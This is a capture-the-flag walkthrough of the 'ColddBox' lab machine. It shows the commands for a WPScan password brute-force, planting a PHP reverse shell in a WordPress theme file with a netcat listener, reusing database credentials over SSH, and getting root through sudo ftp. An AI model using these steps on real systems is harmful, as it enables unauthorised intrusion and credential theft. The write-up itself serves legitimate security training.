# ColddBox ## Nmap ``` sudo nmap 10.10.189.203 -p- -sS -sV PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` With only port 80 worth enumerating for the moment we can start here. The root page directs to the page below in which we can see is powered by Wordpress. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-968f01eef34292c8a5e9af7d9734014b132e5465%2Fimage.png?alt=media) As we are dealing with Wordpress we can run WPScan against the target. ``` wpscan --url http://10.10.189.203 -t 40 -e ap,u1-1000 --passwords /usr/share/wordlists/rockyou.txt ``` Soon WPScan identifies multiple users and soon reports a successful login attempt as the user 'c0ldd'. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8af88fb8f159fecedd948a424b3d312fd34bf22d%2Fimage.png?alt=media) Heading over to /wp-admin we can then proceed to login with the credentials we have found. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ef1e469ed564b4020b68f884f19c77708cdd6285%2Fimage.png?alt=media) From here we can attempt to gain a reverse shell by editing one of the pages. Ideally index.php. Head over to Appearence > Editor and on the right select Main Index. I then removed the original code and inserted a reverse shell which can be found here: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae177abbeef19fadcd1665a80a3170e52dbee795%2Fimage.png?alt=media) After replacing the code and updating the file we can start a `netcat` listener on our attacking machine. ``` sudo nc -lvp 80 ``` The browse to index.php on the main page. The page should hang and we should have a shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-44fda05bbbeca26a0cbde1a8491baae94b91f4d8%2Fimage.png?alt=media) I then upgraded the shell to something nicer using the command below: ``` /usr/bin/script -qc /bin/bash /dev/null ``` Manually enumerating the machine we find the user c0ldd. Apart from a user flag nothing interesting was inside the home profile. We know that Wordpress is installed so we can check wp-config.php located at: `/var/www/html/wp-config.php` Viewing this file we come across some database information. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0c59699c4e25ab614bc52b80cb85987bc034af0c%2Fimage.png?alt=media) I then used the same credentials against SSH and was able to login as c0ldd. As SSH is running on port 4512 the `-p` switch was used to specify an alternate port. ``` ssh -p 4512 c0ldd@10.10.189.203 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14da9c3794372cbb09e6dfd95caa588ceb80dae2%2Fimage.png?alt=media) Checking sudo with `sudo -l` shows we can run the following commands on the target machine as root. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa3149e5ba9ea818695b51a2d191ec216df6875c%2Fimage.png?alt=media) Checking [GTFOBins](https://gtfobins.github.io/gtfobins/ftp/#sudo) against the FTP binary shows this can be used to gain a root shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-df5d6e1d0c8cbbadd2d274baa68c766460067ef1%2Fimage.png?alt=media) ``` sudo -u root /usr/bin/ftp !/bin/sh ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a781f98a84a300b4c26ad5115a88416228d0a082%2Fimage.png?alt=media)